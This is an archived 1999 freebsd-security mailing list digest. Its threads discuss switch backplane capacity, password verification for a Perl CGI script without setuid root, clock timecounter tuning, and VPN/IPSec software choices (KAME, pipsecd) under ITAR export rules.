Sun, 22 Aug 1999 16:47:24 -0400 (EDT) Date: Sun, 22 Aug 1999 16:47:24 -0400 (EDT) From: Bill Fumerola To: Chris Dillon Cc: Wes Peters , Cliff Skolnick , Bigby Findrake , jay d , "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 22 Aug 1999, Chris Dillon wrote: > Gotcha I've found by looking at the specs is that it only has a > 3.8Gbit/sec backplane. This is only enough to keep 19 100mbit ports > saturated at full duplex, but you're also paying less money for this > 40-port switch than most other halfway-decent 24-port switches. I > wonder if local switching takes place on each of the "blades" > (expansion modules). I still think its worth the money even with the > limited backplane. That's more backplane then my (more expensive) baystack 450s can handle. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 17:18:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 0D01314D54 for ; Sun, 22 Aug 1999 17:18:15 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id RAA33539; Sun, 22 Aug 1999 17:17:59 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908230017.RAA33539@gndrsh.dnsmgr.net> Subject: Re: getting passwored data via a perl cgi In-Reply-To: <19990822223619.B11240@keltia.freenix.fr> from Ollivier Robert at "Aug 22, 1999 10:36:19 pm" To: roberto@keltia.freenix.fr (Ollivier Robert) Date: Sun, 22 Aug 1999 17:17:58 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > According to Colin Eric Johnson: > > Is there a way to allow other users access to complete password database? > > I understand, basically, why this is restricted but I'm not sure how else > > to solve this given FreeBSDs restrictions. > > Either you make it setuid root or you wipe up a daemon that runs as root and wip? > make your script discuss with the daemon. The daemon could cache entries for > example (although pwd lookups should be fast thanks to the DB files). You can find a program used by cyrus for just what you are trying to do in ports/mail/cyrus, it's called pwcheck. There are probably some others around, this is just one that I ran accross recently. IMHO making your cgi script suid root would be asking for a security breach some day, probably sooner than latter. Cyrus is a a large daemon, but it took this route for dealing with this problem for good reasons. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 18:44:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id C8E9A14FEC for ; Sun, 22 Aug 1999 18:44:15 -0700 (PDT) (envelope-from ben@scientia.demon.co.uk) Received: from lithium.scientia.demon.co.uk ([192.168.0.3]) by scientia.demon.co.uk with esmtp (Exim 3.032 #1) id 11IhVK-0009zG-00; Mon, 23 Aug 1999 00:58:26 +0100 Received: (from ben) by lithium.scientia.demon.co.uk (Exim 3.032 #1) id 11IhVJ-00008G-00; Mon, 23 Aug 1999 00:58:25 +0100 Date: Mon, 23 Aug 1999 00:58:24 +0100 From: Ben Smithurst To: Bruce Evans Cc: gjb-freebsd@gba.oz.au, freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time Message-ID: <19990823005824.A464@lithium.scientia.demon.co.uk> References: <199908220738.RAA28514@godzilla.zeta.org.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i In-Reply-To: <199908220738.RAA28514@godzilla.zeta.org.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bruce Evans wrote: > Change the frequency of active timecounter to closer to its actual > frequency using `sysctl -w ...'. The hardware timecounters and their > frequencies can be found using `sysctl -a | grep _freq'. The currently > active timecounter can be found and changed in -current only using > `sysctl [-w] kern.timecounter.hardware'. Thanks for the info. After adjusting that, my clock now gained just 16ms in 70 minutes. Quite an improvement over 1s in one hour, but I'll continue to tweak it. -- Ben Smithurst | PGP: 0x99392F7D ben@scientia.demon.co.uk | key available from keyservers and | ben+pgp@scientia.demon.co.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 18:51:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id 6C92C14EF5 for ; Sun, 22 Aug 1999 18:51:19 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #1) id 11IjGR-00059A-00; Sun, 22 Aug 1999 19:51:11 -0600 Message-ID: <37C0A90E.D5452A10@softweyr.com> Date: Sun, 22 Aug 1999 19:51:10 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Chris Dillon Cc: freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Chris Dillon wrote: > > On Sat, 21 Aug 1999, Wes Peters wrote: > > > You obviously didn't follow the links. The HP ProCurve I mentioned is $1880 > > for 40 switched 10/100 ports with layer 3 functionality and VLAN support. > > That's $47 port port, much lower than your $250/port, with a LOT more performance > > also. The Tolly Group recently tested it and found it capable of sustaining > > full wire speed on all 40 ports. I'll just be your PCI-bus box isn't going > > to hit 4 Gbps throughput. > > I noticed the only "L3 support" from the spec sheets of the 4000M and > 8000M is IGMP snooping to control multicast traffic, and "protocol > filtering" only on the 8000M. Nothing close to IP routing, however > (not that you said it did, specifically, just clarifying). That's why the price is so much "better" than the 24-port OmniStack. The OS4024 does L2 switching, L3 routing for IP and IPX, supports RIPv1 routing protocols, DHCP redirection, L3 authentication, etc., etc., etc. > When the > Tolly Group said they could "sustain full wire speed on all 40 ports", > was that testing each one at a time or all at once? My math isn't > quite warped enough to allow 40 100Mbit/FD ports to all be saturated > with only a 3.8Gbit backplane, unless local switching occurs on each > of the port modules, and even then the "throughput test" would have to > take that into account and not try to move too much data across the > backplane. I'd have to go find the article again. The vendors have an interesting role in some of these tests, where they have the Tolly Group verify some of the claims the vendors make. In this case, the Tolly Group is basically performing an audit of the test results. They could have concocted a test they know the switch will pass and then have Tolly just verify the switch does indeed do what they say it does in all the fine print. In this case, it would seem it would have to be a half-duplex test at the very least. > You may also notice that the HP ProCurve 9304M and 9308M Routing > Switches (these DO have IP/IPX routing, but they certainly aren't > cheap... nice kit, BTW), bear an uncanny resemblance in both looks, > specs, and a digit of their model name to the Foundry Networks BigIron > 4000 and 8000, respectively. My experience has been you have to be careful whom you OEM to in this industry, lest they decide they want ALL of your equipment painted their color. It's been pretty good for Xylanders so far. At least the new color isn't beige. (Ack!) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 18:57: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id C785915409 for ; Sun, 22 Aug 1999 18:57:00 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #1) id 11IjM0-0005iI-00; Sun, 22 Aug 1999 19:56:56 -0600 Message-ID: <37C0AA66.FD70C73C@softweyr.com> Date: Sun, 22 Aug 1999 19:56:54 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: "Rodney W. Grimes" Cc: Chris Dillon , Cliff Skolnick , jay d , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network References: <199908220649.XAA31700@gndrsh.dnsmgr.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Rodney W. Grimes" wrote: > > Your making a common mistake here when an ``ALL PORTS FULL LOAD'' test > is done, if you have 40 ports all being sent data at 100MB/sec that > data is going to have to come out on 40 ports someplace, so you only need > 4Gbit/sec of backplane to do this. Thats 4G bytes of data in, 4G > accross the backplane, and 4G back out of the box. > > Maybe a drawing would help: > > rxpair of port 1 > +---------+ > txpair of port n > rxpair of port 2 > | | .... > rxpair of port 3 > | Fabric | > txpair of port 3 > ... | | > txpair of port 2 > rxpair of port n > +---------+ > txpair of port 1 > > As you can see the Fabric only has to handle 40 x 100Mb/s to > keep all 40 ports busy at full duplex. > > The 3.8 Gb/s spec comes up a little short, but only buy 2 ports... > and it had better be darned efficent as far as overhead goes... > > Allowing the port cards to short circuit bridge (and every switch > chip set I have looked at does this) makes it easy to pass this > test, infact you can do it with 0 load on the backplane. My > drawing above tends to put the maximal load on a switches backplane, > but unless the vendor tells you exactly how they tested the benchmark > is like any other benchmark without all the nitty gritty details, > total sales and marketing propoganda. That's what I said to Chris, only I said it a little nicer. I have to, since I'm part of that industry. ;^) To paraphrase Mark Twain: "There are 3 kinds of lies: lies, damned lies, and benchmarks." On the OS4024 we were discussing, it wouldn't matter which port pairs you picked, because they're all on the same NI - the 4024 is basically a single Network Interface built into a shruken chassis. If the traffic is all in the same VLAN, it will only get to the "backplane" once, to the source learning process. After that, the packets will always be switched on the NI. Performance then becomes a matter of efficient buffering. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 19: 6:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 9C86414C81 for ; Sun, 22 Aug 1999 19:06:12 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.8.8/8.8.8) id WAA24192 for freebsd-security@freebsd.org; Sun, 22 Aug 1999 22:06:01 -0400 (EDT) (envelope-from cjc) From: "Crist J. Clark" Message-Id: <199908230206.WAA24192@cc942873-a.ewndsr1.nj.home.com> Subject: Re: getting passwored data via a perl cgi In-Reply-To: from Colin Eric Johnson at "Aug 22, 99 09:57:31 am" To: colinj@cs.unm.edu (Colin Eric Johnson) Date: Sun, 22 Aug 1999 12:49:10 -0400 (EDT) Reply-To: cjclark@home.com X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Colin Eric Johnson wrote, > > I'm in the process of writing a cgi script in perl that should verify > people against the machines password file. The problem that I am running > into is that if the script is run by anyone other then root I get an > empty encrypted password field. > > I don't want to run the cgi SUID root as this doesn't seem safe. > > Is there a way to allow other users access to complete password database? > I understand, basically, why this is restricted but I'm not sure how else > to solve this given FreeBSDs restrictions. Not sure if this is the prefered way to go but... I worked around a problem like this in a shell script by executing su. IIRC, I did something like, if su $USERNAME -c :; then . . Provided you have not redirected stdout or stdin, the person executing the script gets prompted for 'Password:' and it is fed to su which does the verification for you. su will only exit on success if the password is correct and the user has login capabilities. -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 19:32:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from srv4inet.mymail.com.br (srv4inet.tba.com.br [200.202.37.5]) by hub.freebsd.org (Postfix) with SMTP id C963414EEA for ; Sun, 22 Aug 1999 19:31:48 -0700 (PDT) (envelope-from fsc@mymail.com.br) Received: from [200.248.180.107] by srv4inet.mymail.com.br (NTMail 3.03.0017/1.ahjw) with ESMTP id da110061 for ; Sun, 22 Aug 1999 23:27:54 -0300 Message-Id: <1.5.4.32.19990823023043.009dfd54@mymail.com.br> X-Sender: fsc@mymail.com.br (Unverified) X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Sun, 22 Aug 1999 23:30:43 -0300 To: freebsd-security@freebsd.org From: Fabio da Silva Cunha Subject: VPN for FreeBSD 2.2.8 and 3.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Friends! I need to make a VPN beetwen three FreeBSD 2.2.8/3.2 Servers. =20 Any software recomendations? FreeBSD Supports IPSec? Topology: [---------] [---------] [ FreeBSD ] [ FreeBSD ] LAN A --[ 1 ]---> INTERNET <---[ 2 ]-- LAN B 10.1.x.x [ 3.2 ] | [ 2.2.8 ] 10.2.x.x [---------] | [---------] | | [---------] [ FreeBSD ] [ 3 ]-- LAN C [ 2.2.8 ] 10.3.x.x [---------] Thanks in Advance! Best Regards, F=E1bio da Silva Cunha To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 19:38:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id A9E641541F for ; Sun, 22 Aug 1999 19:38:15 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id MAA25589; Mon, 23 Aug 1999 12:39:37 +1000 Date: Mon, 23 Aug 1999 12:39:37 +1000 (EST) From: Nicholas Brawn To: Fabio da Silva Cunha Cc: freebsd-security@FreeBSD.ORG Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 In-Reply-To: <1.5.4.32.19990823023043.009dfd54@mymail.com.br> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Have a look at www.kame.net, and see if it fits your requirements. KAME is a freely available IPv6 & IPSec stack for BSD (developed in Japan). Cheers, Nick On Sun, 22 Aug 1999, Fabio da Silva Cunha wrote: >=20 > Hi Friends! >=20 > I need to make a VPN beetwen three FreeBSD 2.2.8/3.2 Servers. > =20 > Any software recomendations? >=20 > FreeBSD Supports IPSec? >=20 > Topology: >=20 > [---------] [---------] > [ FreeBSD ] [ FreeBSD ] > LAN A --[ 1 ]---> INTERNET <---[ 2 ]-- LAN B > 10.1.x.x [ 3.2 ] | [ 2.2.8 ] 10.2.x.x > [---------] | [---------] > | > | > [---------] > [ FreeBSD ] > [ 3 ]-- LAN C > [ 2.2.8 ] 10.3.x.x > [---------] >=20 > Thanks in Advance! >=20 > Best Regards, >=20 > F=E1bio da Silva Cunha >=20 >=20 >=20 >=20 >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message >=20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 19:56:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from postoffice.aims.com.au (advanc2.lnk.telstra.net [139.130.119.73]) by hub.freebsd.org (Postfix) with ESMTP id E270514E73 for ; Sun, 22 Aug 1999 19:56:14 -0700 (PDT) (envelope-from Chris@aims.com.au) Received: from postoffice.aims.com.au (nts-ts1.aims.private [192.168.0.2]) by postoffice.aims.com.au (8.9.3/8.9.3) with ESMTP id MAA25984 for ; Mon, 23 Aug 1999 12:56:51 +1000 (EST) (envelope-from Chris@aims.com.au) Received: from nts-ts1 by aims.com.au with SMTP (MDaemon.v2.84.R) for ; Mon, 23 Aug 1999 12:53:58 +1000 From: "Chris Knight" To: Subject: RE: VPN for FreeBSD 2.2.8 and 3.2 Date: Mon, 23 Aug 1999 12:53:57 +1000 Message-ID: <001501beed12$bf071820$0200a8c0@nts-ts1.aims.private> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-reply-to: <1.5.4.32.19990823023043.009dfd54@mymail.com.br> X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Importance: Normal X-MDaemon-Deliver-To: freebsd-security@FreeBSD.ORG X-Return-Path: Chris@aims.com.au Reply-To: chris@aims.com.au Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Howdy, Try pipsecd in the ports tree. It's a lot easier to get a working tunnel up and running than KAME. Regards, Chris Knight Systems Administrator AIMS Independent Computer Professionals Tel: +61 3 6334 6664 Fax: +61 3 6331 7032 Mob: +61 419 528 795 Web: http://www.aims.com.au > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Fabio da Silva > Cunha > Sent: Monday, 23 August 1999 12:31 > To: freebsd-security@FreeBSD.ORG > Subject: VPN for FreeBSD 2.2.8 and 3.2 > > > > Hi Friends! > > I need to make a VPN beetwen three FreeBSD 2.2.8/3.2 Servers. > > Any software recomendations? > > FreeBSD Supports IPSec? > > Topology: > > [---------] [---------] > [ FreeBSD ] [ FreeBSD ] > LAN A --[ 1 ]---> INTERNET <---[ 2 ]-- LAN B > 10.1.x.x [ 3.2 ] | [ 2.2.8 ] 10.2.x.x > [---------] | [---------] > | > | > [---------] > [ FreeBSD ] > [ 3 ]-- LAN C > [ 2.2.8 ] 10.3.x.x > [---------] > > Thanks in Advance! > > Best Regards, > > Fábio da Silva Cunha > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 20: 3:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from srv4inet.mymail.com.br (srv4inet.tba.com.br [200.202.37.5]) by hub.freebsd.org (Postfix) with SMTP id C1B97153D1 for ; Sun, 22 Aug 1999 20:03:00 -0700 (PDT) (envelope-from fsc@mymail.com.br) Received: from [200.248.180.106] by srv4inet.mymail.com.br (NTMail 3.03.0017/1.ahjw) with ESMTP id ra110335 for ; Mon, 23 Aug 1999 00:01:28 -0300 Message-Id: <1.5.4.32.19990823030416.009fbf08@mymail.com.br> X-Sender: fsc@mymail.com.br X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Mon, 23 Aug 1999 00:04:16 -0300 To: chris@aims.com.au From: Fabio da Silva Cunha Subject: RE: VPN for FreeBSD 2.2.8 and 3.2 Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! At 12:53 23/08/1999 +1000, you wrote: >Howdy, > Try pipsecd in the ports tree. It's a lot easier to get a working tunnel= up >and running than KAME. > What crypto this supports? DES / 3DES / BlowFish ? regards F=E1bio da Silva Cunha To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 20:12:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id 3112F14D51 for ; Sun, 22 Aug 1999 20:12:16 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id NAA21286; Mon, 23 Aug 1999 13:11:23 +1000 (EST) From: Darren Reed Message-Id: <199908230311.NAA21286@cheops.anu.edu.au> Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 To: ncb@zip.com.au (Nicholas Brawn) Date: Mon, 23 Aug 1999 13:11:23 +1000 (EST) Cc: fsc@mymail.com.br, freebsd-security@FreeBSD.ORG In-Reply-To: from "Nicholas Brawn" at Aug 23, 99 12:39:37 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Nicholas Brawn, sie said: > > Have a look at www.kame.net, and see if it fits your requirements. KAME is > a freely available IPv6 & IPSec stack for BSD (developed in Japan). You mean it's not yet integrated into FreeBSD ?! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 20:13:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from postoffice.aims.com.au (advanc2.lnk.telstra.net [139.130.119.73]) by hub.freebsd.org (Postfix) with ESMTP id 9002A14EA8 for ; Sun, 22 Aug 1999 20:13:14 -0700 (PDT) (envelope-from Chris@aims.com.au) Received: from postoffice.aims.com.au (nts-ts1.aims.private [192.168.0.2]) by postoffice.aims.com.au (8.9.3/8.9.3) with ESMTP id NAA26058 for ; Mon, 23 Aug 1999 13:13:09 +1000 (EST) (envelope-from Chris@aims.com.au) Received: from nts-ts1 by aims.com.au with SMTP (MDaemon.v2.84.R) for ; Mon, 23 Aug 1999 13:10:16 +1000 From: "Chris Knight" To: Cc: Subject: RE: VPN for FreeBSD 2.2.8 and 3.2 Date: Mon, 23 Aug 1999 13:10:15 +1000 Message-ID: <002501beed15$05e4a800$0200a8c0@nts-ts1.aims.private> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-reply-to: <1.5.4.32.19990823030416.009fbf08@mymail.com.br> X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Importance: Normal X-MDaemon-Deliver-To: freebsd-security@FreeBSD.ORG X-Return-Path: Chris@aims.com.au Reply-To: Chris@aims.com.au Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From the README file: Currently implements: - IPSEC-compliant IP tunnelling (i.e., tunnel-mode only): - authentication: IP-AH (RFC 2402) and HMAC (RFC 2104) with: RFC 2403: MD5 (HMAC-MD5-96) RFC 2404: SHA1 (HMAC-SHA1-96) RIPEMD160 (HMAC-RIPEMD160-96) - encryption: IP-ESP (RFC 2406) with: Blowfish in CBC mode. RFC 2405: DES in CBC mode. DES3 in CBC mode. CAST in CBC mode. IDEA in CBC mode. Regards, Chris Knight Systems Administrator AIMS Independent Computer Professionals Tel: +61 3 6334 6664 Fax: +61 3 6331 7032 Mob: +61 419 528 795 Web: http://www.aims.com.au > -----Original Message----- > From: Fabio da Silva Cunha [mailto:fsc@mymail.com.br] > Sent: Monday, 23 August 1999 13:04 > To: chris@aims.com.au > Cc: freebsd-security@FreeBSD.ORG > Subject: RE: VPN for FreeBSD 2.2.8 and 3.2 > > > > Hi! > > At 12:53 23/08/1999 +1000, you wrote: > >Howdy, > > Try pipsecd in the ports tree. It's a lot easier to get > a working tunnel up > >and running than KAME. > > > > What crypto this supports? > > DES / 3DES / BlowFish ? > > regards > > Fábio da Silva Cunha > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 20:14:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from trump.amber.org (trump.amber.org [209.31.146.82]) by hub.freebsd.org (Postfix) with ESMTP id 3A68514E99 for ; Sun, 22 Aug 1999 20:14:53 -0700 (PDT) (envelope-from petrilli@amber.org) Received: by trump.amber.org (Postfix, from userid 1000) id F17841862A; Sun, 22 Aug 1999 23:14:52 -0400 (EDT) Message-ID: <19990822231452.A18458@amber.org> Date: Sun, 22 Aug 1999 23:14:52 -0400 From: Christopher Petrilli To: freebsd-security@FreeBSD.ORG Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 References: <199908230311.NAA21286@cheops.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199908230311.NAA21286@cheops.anu.edu.au>; from Darren Reed on Mon, Aug 23, 1999 at 01:11:23PM +1000 X-Disclaimer: I hardly speak for myself, muchless anyone else. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Aug 23, 1999 at 01:11:23PM +1000, Darren Reed wrote: > In some mail from Nicholas Brawn, sie said: > > > > Have a look at www.kame.net, and see if it fits your requirements. KAME is > > a freely available IPv6 & IPSec stack for BSD (developed in Japan). > > You mean it's not yet integrated into FreeBSD ?! No, and never will be so long as ITAR stands, and the FreeBSD group is based in the UNited States. This is why OpenBSD has to jump through so many hoops to stay legal. Unfortunately, the KAME integation isn't for the faint of heart. Chris -- | Christopher Petrilli ``Television is bubble-gum for | petrilli@amber.org the mind.''-Frank Lloyd Wright To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 20:24:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 28DA514D51 for ; Sun, 22 Aug 1999 20:24:21 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id UAA04617; Sun, 22 Aug 1999 20:22:40 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Christopher Petrilli Cc: freebsd-security@FreeBSD.ORG Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 In-reply-to: Your message of "Sun, 22 Aug 1999 23:14:52 EDT." <19990822231452.A18458@amber.org> Date: Sun, 22 Aug 1999 20:22:40 -0700 Message-ID: <4613.935378560@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > No, and never will be so long as ITAR stands, and the FreeBSD group is > based in the UNited States. This is why OpenBSD has to jump through so > many hoops to stay legal. I'm not really sure that ITAR will be standing in its current form for much longer. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 20:36:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id A64E614CE3 for ; Sun, 22 Aug 1999 20:36:49 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id NAA21519; Mon, 23 Aug 1999 13:36:37 +1000 (EST) From: Darren Reed Message-Id: <199908230336.NAA21519@cheops.anu.edu.au> Subject: Re: VPN for FreeBSD 2.2.8 and 3.2 To: petrilli@amber.org (Christopher Petrilli) Date: Mon, 23 Aug 1999 13:36:16 +1000 (EST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <19990822231452.A18458@amber.org> from "Christopher Petrilli" at Aug 22, 99 11:14:52 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Christopher Petrilli, sie said: > > On Mon, Aug 23, 1999 at 01:11:23PM +1000, Darren Reed wrote: > > In some mail from Nicholas Brawn, sie said: > > > > > > Have a look at www.kame.net, and see if it fits your requirements. KAME is > > > a freely available IPv6 & IPSec stack for BSD (developed in Japan). > > > > You mean it's not yet integrated into FreeBSD ?! > > No, and never will be so long as ITAR stands, and the FreeBSD group is > based in the UNited States. This is why OpenBSD has to jump through so > many hoops to stay legal. Bah, so FreeBSD will be InSecureBSD ? Well, so long as the ITAR bear stands around making grizzly noises at people, it seems. > Unfortunately, the KAME integation isn't for the faint of heart. > Chris FreeBSD appears to be doing better than the other two groups in terms of resources...there are ways around it although I'm disappointed to see that FreeBSD isn't interested. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 22 20:43: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 7573714D8F for ; Sun, 22 Aug 1999 20:43:00 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost 